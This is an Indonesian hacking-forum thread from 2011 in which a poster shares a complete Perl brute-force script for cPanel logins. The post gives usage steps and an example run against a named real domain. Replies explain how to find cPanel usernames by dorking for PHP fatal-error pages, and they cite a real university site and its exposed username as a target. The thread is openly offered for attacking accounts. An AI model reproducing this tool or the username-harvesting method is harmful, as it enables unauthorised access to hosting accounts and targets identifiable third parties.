Cpanel Bruteforce Tool

**NoseTrave** · 10-19-2011, 11:14 AM

Halo Semua ! Bertemu Lagi Dengan NoseTrave Yang Paling Ganteng Se Forum! (Hah Zee? Siapatuh? Masih Gantengan Gua Kali) lol,

Kali Ini Aku Mau Share Tentang Tool Yang Satu Ini

Langsung Aja Surge Nya

PHP Code:
#!/usr/bin/perl
# Cpanel Password Brute Forcer
# ----------------------------
# (c)oded By Hessam-x
# Perl Version ( low speed )
# Oerginal Advisory :
# http://www.simorgh-ev.com/advisory/2006/cpanel-bruteforce-vule/
use IO::Socket;
use LWP::Simple;
use MIME::Base64;

$host = $ARGV[0];
$user = $ARGV[1];
$port = $ARGV[2];
$list = $ARGV[3];
$file = $ARGV[4];
$url = "http://".$host.":".$port;
if(@ARGV < 3){
print q(
################################################## #############
# Cpanel Password Brute Force Tool #
################################################## #############
# usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
#-------------------------------------------------------------#
# [Host] : victim Host (simorgh-ev.com) #
# [User] : User Name (demo) #
# [PORT] : Port of Cpanel (2082) #
#[list] : File Of password list (list.txt) #
# [File] : file for save password (password.txt) #
# #
################################################## #############
# (c)oded By Hessam-x / simorgh-ev.com #
################################################## #############
);exit;}

headx();

$numstart = "-1";

sub headx() {
print q(
################################################## #############
# Cpanel Password Brute Force Tool #
# (c)oded By Hessam-x / simorgh-ev.com #
################################################## #############
);
open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";
@PASSWORDS = <PASSFILE>;
close PASSFILE;
foreach my $P (@PASSWORDS) {
chomp $P;
$passwd = $P;
print "
[~] Try Password : $passwd
";
&brut;
};
}
sub brut() {
$authx = encode_base64($user.":".$passwd);
print $authx;
my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "
[-] Can not connect to the host";
print $sock "GET / HTTP/1.1
";
print $sock "Authorization: Basic $authx
";
print $sock "Connection: Close

";
read $sock, $answer, 128;
close($sock);

if ($answer =~ /Moved/) {
print "
[~] PASSWORD FOUND : $passwd
";
exit();
}
} 

Simpan Dengan nama cpanel.pl

Cara Pakainya Sederhana:

PHP Code:
perl cpanel.pl [HOST] [User] [PORT] [list] [File] 

Pengertian: -Host: Website Cpanel Yang Menjadi Target.
-User: username Nya!
-Port Cpanelnya (Biasanya 2082)
-List: Password list Ente (Yang Belum Punya Download Di IBT ato Google)
-File: File Untuk Menempatkan Hasil

Nah Ini Contoh Live Nya:

PHP Code:
root@Anarc0de:~# perl cpanel.pl thehopebuster.us ares 2082 /root/Desktop/dictionary.txt /root/Desktop/password.txt 

Sekian Dari NoseTrave!
Sangat Butuh Ijo-Ijo! (Buat Menangin Hosting)

Maaf Kalo Ada Salah Salah Kata!, Akhir Kata Terimakasih

**guitariznoize** · 10-19-2011, 11:34 AM

nice Info

**nonot** · 10-19-2011, 11:48 AM

tool buat apa ya? tlg jelasin dong om ganteng. Smile

sekalian mo nanya tool buat bikin list password format txt/lst bisa donlot dimana ya?

#maaf aku pengguna baru banget.

**NoseTrave** · 10-19-2011, 11:50 AM

sama Sama

(10-19-2011, 11:48 AM)nonot Wrote: tool buat apa ya? tlg jelasin dong om ganteng.
sekalian mo nanya tool buat bikin list password format txt/lst bisa donlot dimana ya?

#maaf aku pengguna baru banget.

Buat Menyerang Password Cpanel Dengan Metoda Bruteforce

untuk passlist lihat dimari
http://forum.indonesianbacktrack.or.id/s...hp?tid=581

**betefive** · 10-19-2011, 01:56 PM

ga bsa buka link nya om... bisa attach yg baru?

**THJC** · 10-19-2011, 05:15 PM

(10-19-2011, 01:56 PM)betefive Wrote: ga bsa buka link nya om... bisa attach yg baru?

Link? link yang mana om?

Wordlist?
http://www.indonesianbacktrack.or.id/?p=477

**koecroet** · 10-19-2011, 08:00 PM

cara tau usernya dari mana om??

**NoseTrave** · 10-19-2011, 09:21 PM

(10-19-2011, 08:00 PM)koecroet Wrote: cara tau usernya dari mana om??

Tanya Aja Sama Adminnya wkokwowkow

Saya juga Ngak Tahu.

**koecroet** · 10-23-2011, 06:46 PM

(10-19-2011, 09:21 PM)NoseTrave Wrote:
(10-19-2011, 08:00 PM)koecroet Wrote: cara tau usernya dari mana om??

Tanya Aja Sama Adminnya wkokwowkow

Saya juga Ngak Tahu.

parah gk tanggung jawab Tongue

**guitariznoize** · 10-23-2011, 09:42 PM

(10-19-2011, 08:00 PM)koecroet Wrote: cara tau usernya dari mana om??

untuk mengetahui username dari cpanel
biasanya dari halaman yang ada fatal errornya...
disitu bisa kliatan nama direktori kadang jga username cpanel klo web tersebut memakai cpanel... Confused

contoh cara mencari Fatal error bisa dengan berbagai teknik
dengan dork di google : Dorknya

hasilnya ada beberapa
misalkan ini :

http://www.ppsuinsgdbdg.ac.id/wp-includes/wp-db.php

Code:
Fatal error: Call to undefined function wp_die() in /home/yudwebid/public_html/ppsuinsgdbdg.ac.id/wp-includes/wp-db.php on line 1039

liat nama direktori sesudah direktori "home"
itu nama usernamenya : "yudwebid"
login cpanelnya ya di sini : http://www.ppsuinsgdbdg.ac.id/cpanel atau http://www.ppsuinsgdbdg.ac.id:2082

kira" sih seperti menurut sepengetahuan saya....
jadi nama direktori yang terlihat adalah nama username yang di pakai login...
tapi ga tau jga kemungkinan nama direktori bukan nama username untuk login..